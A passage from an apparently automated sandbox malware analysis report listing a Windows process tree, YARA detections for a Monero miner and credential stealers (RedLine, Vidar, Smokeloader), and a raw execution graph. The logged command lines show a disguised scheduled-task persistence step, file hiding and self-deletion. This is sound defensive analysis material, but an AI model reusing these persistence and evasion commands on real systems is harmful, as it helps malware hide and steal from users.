                                                                                                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                      Imagebase:0x7ff63f370000
                                                                                                                                                                                                      File size:23'040 bytes
                                                                                                                                                                                                      MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff673430000
                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                                                                      Imagebase:0x7ff761180000
                                                                                                                                                                                                      File size:235'008 bytes
                                                                                                                                                                                                      MD5 hash:796B784E98008854C27F4B18D287BA30
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff673430000
                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                                                                      Imagebase:0x7ff6bb4e0000
                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff673430000
                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff673430000
                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                                                                      Imagebase:0x7ff658c30000
                                                                                                                                                                                                      File size:22'528 bytes
                                                                                                                                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                      Imagebase:0x7ff678f40000
                                                                                                                                                                                                      File size:1'827'328 bytes
                                                                                                                                                                                                      MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                      • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 71%, ReversingLabs
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:explorer.exe
                                                                                                                                                                                                      Imagebase:0x7ff6a76c0000
                                                                                                                                                                                                      File size:4'849'904 bytes
                                                                                                                                                                                                      MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.269554816675.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.269554816675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.269556564358.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000002.269556913458.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                      Start time:18:21:23
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                      Imagebase:0x7ff6bb4e0000
                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:37
                                                                                                                                                                                                      Start time:18:21:24
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff673430000
                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                      Start time:18:21:24
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"
                                                                                                                                                                                                      Imagebase:0x7ff636e60000
                                                                                                                                                                                                      File size:605'696 bytes
                                                                                                                                                                                                      MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 63%, ReversingLabs
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                      Start time:18:21:24
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                                                                                                                                                      Imagebase:0x7ff658c30000
                                                                                                                                                                                                      File size:22'528 bytes
                                                                                                                                                                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:40
                                                                                                                                                                                                      Start time:18:21:25
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
                                                                                                                                                                                                      Imagebase:0x7ff636e60000
                                                                                                                                                                                                      File size:605'696 bytes
                                                                                                                                                                                                      MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:41
                                                                                                                                                                                                      Start time:18:21:28
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"
                                                                                                                                                                                                      Imagebase:0x7ff6bd5f0000
                                                                                                                                                                                                      File size:605'696 bytes
                                                                                                                                                                                                      MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 63%, ReversingLabs
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                      Start time:18:21:31
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                      Imagebase:0x7ff70fbc0000
                                                                                                                                                                                                      File size:251'392 bytes
                                                                                                                                                                                                      MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:43
                                                                                                                                                                                                      Start time:18:21:33
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"
                                                                                                                                                                                                      Imagebase:0x7ff67d4d0000
                                                                                                                                                                                                      File size:605'696 bytes
                                                                                                                                                                                                      MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 63%, ReversingLabs
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                                      Start time:18:21:33
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                      Imagebase:0x7ff734c50000
                                                                                                                                                                                                      File size:251'392 bytes
                                                                                                                                                                                                      MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Target ID:45
                                                                                                                                                                                                      Start time:18:21:44
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                      Imagebase:0x7ff734c50000
                                                                                                                                                                                                      File size:251'392 bytes
                                                                                                                                                                                                      MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Target ID:46
                                                                                                                                                                                                      Start time:18:21:46
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
                                                                                                                                                                                                      Imagebase:0x7ff741ba0000
                                                                                                                                                                                                      File size:73'505'272 bytes
                                                                                                                                                                                                      MD5 hash:EC1C0306004DB340A454EEAC2ABEDA4A
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:47
                                                                                                                                                                                                      Start time:18:21:49
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exe"
                                                                                                                                                                                                      Imagebase:0x7ff741ba0000
                                                                                                                                                                                                      File size:73'505'272 bytes
                                                                                                                                                                                                      MD5 hash:EC1C0306004DB340A454EEAC2ABEDA4A
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:48
                                                                                                                                                                                                      Start time:18:21:49
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exe"
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      File size:321'024 bytes
                                                                                                                                                                                                      MD5 hash:876A365BDA09B9EF39605E375D677F0A
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000030.00000002.270506120282.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000030.00000002.270498807238.0000000000899000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.270484343016.00000000005B9000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 62%, ReversingLabs
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Target ID:49
                                                                                                                                                                                                      Start time:18:21:51
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                      Imagebase:0x7ff6f8ee0000
                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:50
                                                                                                                                                                                                      Start time:18:21:51
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff673430000
                                                                                                                                                                                                      File size:875'008 bytes
                                                                                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      Target ID:51
                                                                                                                                                                                                      Start time:18:21:52
                                                                                                                                                                                                      Start date:14/12/2024
                                                                                                                                                                                                      Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                      Imagebase:0x7ff734c50000
                                                                                                                                                                                                      File size:251'392 bytes
                                                                                                                                                                                                      MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:4.4%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:3.1%
                                                                                                                                                                                                        Total number of Nodes:762
                                                                                                                                                                                                        Total number of Limit Nodes:16
                                                                                                                                                                                                        execution_graph 12395 696629 12396 6964c7 3 API calls 12395->12396 12397 69663a 12396->12397 13095 669ba5 13096 669ba7 13095->13096 13097 665c10 6 API calls 13096->13097 13098 669cb1 13097->13098 13099 668b30 6 API calls 13098->13099 13100 669cc2 13099->13100 12402 66b1a0 12403 66b1f2 12402->12403 12404 66b3ad CoInitialize 12403->12404 12405 66b3fa 12404->12405 12598 6620a0 12599 67c68b 2 API calls 12598->12599 12600 6620ac 12599->12600 12681 664120 12682 66416a 12681->12682 12684 6641b2 12682->12684 12685 663ee0 12682->12685 12686 663f48 12685->12686 12690 663f1e 12685->12690 12688 663f58 12686->12688 12691 662c00 12686->12691 12688->12684 12690->12684 12692 662c0e 12691->12692 12698 67b847 12692->12698 12694 662c42 12695 662c49 12694->12695 12704 662c80 12694->12704 12695->12684 12697 662c58 12699 67b854 12698->12699 12702 67b873 12698->12702 12707 67cb77 12699->12707 12701 67b864 12701->12702 12709 67b81e 12701->12709 12702->12694 12715 67b7fb 12704->12715 12706 662cb2 12706->12697 12708 67cb92 CreateThreadpoolWork 12707->12708 12708->12701 12710 67b827 12709->12710 12713 67cdcc 12710->12713 12712 67b841 12712->12702 12714 67cde1 TpPostWork 12713->12714 12714->12712 12716 67b807 12715->12716 12717 67b817 12715->12717 12716->12717 12719 67ca78 12716->12719 12717->12706 12720 67ca8d TpReleaseWork 12719->12720 12720->12717 12841 66af20 12842 66af63 12841->12842 12853 696660 12842->12853 12847 69663f 4 API calls 12848 66af80 12847->12848 12849 69663f 4 API calls 12848->12849 12850 66af98 12849->12850 12859 6655f0 12850->12859 12852 66b04e 12854 69a671 4 API calls 12853->12854 12855 66af69 12854->12855 12856 69663f 12855->12856 12857 69a671 4 API calls 12856->12857 12858 66af71 12857->12858 12858->12847 12860 665610 12859->12860 12862 665710 12860->12862 12863 6622c0 12860->12863 12862->12852 12866 662280 12863->12866 12867 662296 12866->12867 12870 6987f8 12867->12870 12873 697609 12870->12873 12872 6622a4 12872->12860 12874 697649 12873->12874 12878 697631 12873->12878 12875 69690a 4 API calls 12874->12875 12874->12878 12876 697661 12875->12876 12879 697bc4 12876->12879 12878->12872 12881 697bd5 12879->12881 12880 697be4 12880->12878 12881->12880 12886 698168 12881->12886 12891 697dc2 12881->12891 12896 697de8 12881->12896 12906 697f36 12881->12906 12887 698178 12886->12887 12888 698171 12886->12888 12887->12881 12915 697b50 12888->12915 12890 698177 12890->12881 12892 697dcb 12891->12892 12893 697dd2 12891->12893 12894 697b50 4 API calls 12892->12894 12893->12881 12895 697dd1 12894->12895 12895->12881 12897 697e09 12896->12897 12899 697def 12896->12899 12897->12881 12898 697f69 12904 697f77 12898->12904 12905 697f8b 12898->12905 12923 698241 12898->12923 12899->12897 12899->12898 12901 697fa2 12899->12901 12899->12904 12901->12905 12919 698390 12901->12919 12904->12905 12927 6986ea 12904->12927 12905->12881 12907 697f69 12906->12907 12908 697f4f 12906->12908 12909 698241 4 API calls 12907->12909 12911 697f8b 12907->12911 12913 697f77 12907->12913 12908->12907 12910 697fa2 12908->12910 12908->12913 12909->12913 12910->12911 12912 698390 4 API calls 12910->12912 12911->12881 12912->12913 12913->12911 12914 6986ea 4 API calls 12913->12914 12914->12911 12916 697b62 12915->12916 12917 698ab6 4 API calls 12916->12917 12918 697b85 12917->12918 12918->12890 12920 6983ab 12919->12920 12921 6983dd 12920->12921 12931 69c88e 12920->12931 12921->12904 12924 69825a 12923->12924 12938 69d3c8 12924->12938 12926 69830d 12926->12904 12928 69875d 12927->12928 12930 698707 12927->12930 12928->12905 12929 69c88e 4 API calls 12929->12930 12930->12928 12930->12929 12934 69c733 12931->12934 12933 69c8a6 12933->12921 12935 69c743 12934->12935 12936 69690a GetPEB ExitProcess GetPEB RtlAllocateHeap 12935->12936 12937 69c748 12935->12937 12936->12937 12937->12933 12941 69d3ee 12938->12941 12950 69d3d8 12938->12950 12939 69d485 12943 69d4ae 12939->12943 12944 69d4e4 12939->12944 12940 69d48a 12951 69cbdf 12940->12951 12941->12939 12941->12940 12941->12950 12946 69d4cc 12943->12946 12947 69d4b3 12943->12947 12968 69cef8 12944->12968 12964 69d0e2 12946->12964 12957 69d23e 12947->12957 12950->12926 12952 69cbf1 12951->12952 12953 69690a GetPEB ExitProcess GetPEB RtlAllocateHeap 12952->12953 12954 69cc05 12953->12954 12955 69cc0d 12954->12955 12956 69cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 12954->12956 12955->12950 12956->12955 12958 69d26c 12957->12958 12959 69d2a5 12958->12959 12960 69d2de 12958->12960 12962 69d2b7 12958->12962 12959->12950 12961 69cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12960->12961 12961->12959 12963 69d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12962->12963 12963->12959 12966 69d10f 12964->12966 12965 69d14e 12965->12950 12966->12965 12967 69d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12966->12967 12967->12965 12969 69cf10 12968->12969 12970 69cf75 12969->12970 12971 69cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12969->12971 12970->12950 12971->12970 12977 663fe0 12978 664022 12977->12978 12979 6640d2 12978->12979 12980 66408c 12978->12980 12983 664035 12978->12983 12981 663ee0 3 API calls 12979->12981 12984 6635e0 12980->12984 12981->12983 12985 663616 12984->12985 12989 66364e 12985->12989 12990 662ce0 12985->12990 12987 66369e 12988 662c00 3 API calls 12987->12988 12987->12989 12988->12989 12989->12983 12991 662d1d 12990->12991 12992 67bedf InitOnceExecuteOnce 12991->12992 12993 662d46 12992->12993 12994 662d51 12993->12994 12995 662d88 12993->12995 12999 67bef7 12993->12999 12994->12987 12997 662440 4 API calls 12995->12997 12998 662d9b 12997->12998 12998->12987 13000 67bf03 12999->13000 13001 67bf73 13000->13001 13002 67bf6a 13000->13002 13004 662ae0 5 API calls 13001->13004 13006 67be7f 13002->13006 13005 67bf6f 13004->13005 13005->12995 13007 67cc31 InitOnceExecuteOnce 13006->13007 13008 67be97 13007->13008 13009 67be9e 13008->13009 13010 696cbb 4 API calls 13008->13010 13009->13005 13011 67bea7 13010->13011 13011->13005 12764 664276 12765 662410 5 API calls 12764->12765 12766 66427f 12765->12766 12736 66a9f4 12745 669230 12736->12745 12738 66aa03 12739 665c10 6 API calls 12738->12739 12744 66aab3 12738->12744 12740 66aa65 12739->12740 12741 